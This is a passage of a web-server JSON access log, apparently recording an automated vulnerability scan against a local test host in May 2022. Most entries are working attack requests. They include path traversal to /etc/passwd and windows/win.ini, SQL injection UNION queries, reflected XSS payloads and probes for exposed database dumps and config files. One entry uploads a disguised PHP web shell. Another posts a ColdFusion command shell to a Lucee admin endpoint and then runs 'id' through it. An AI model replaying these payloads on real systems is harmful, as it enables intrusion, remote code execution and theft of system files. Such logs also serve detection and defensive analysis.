+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sysadmin/phpMyAdmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about/../tree?action=get HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joommyadmin/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/tmui/login/welcome.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /em/console/logon/logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CF_SFSD/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-----------------------------31046105003900160576454225745\x0D\x0AContent-Disposition: form-data; name=\x22fileToUpload\x22; filename=\x2229KBxfF9t7Snys26jxnKVTOnLRC.php\x22\x0D\x0AContent-Type: image/gif\x0D\x0A\x0D\x0AGIF89a213213123 \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_async/AsyncResponseService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/data/usrimg/29kbxff9t7snys26jxnkvtonlrc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horizon/auth/login/?next=/horizon/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /radiusmanager/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"imgSrc=\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
Command:value=\x22#form.cmd#\x22>
Options: value=\x22#form.opts#\x22>
Timeout: value=\x22#form.timeout#\x22\x0D\x0A value=\x225\x22>
\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
\x0D\x0A#HTMLCodeFormat(myVar)#\x0D\x0A
\x0D\x0A
\x0D\x0A
","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/admin/imgProcess.cfm?file=/../../../context/29KBxeykqCYtJSuLLsEH3V4RilH.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /IntellectMain.jsp?IntellectSystem=https://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/_swagger_/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yarn.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/agent/self HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///https://example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"cmd=id&opts=&timeout=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/29KBxeykqCYtJSuLLsEH3V4RilH.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/info.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.json 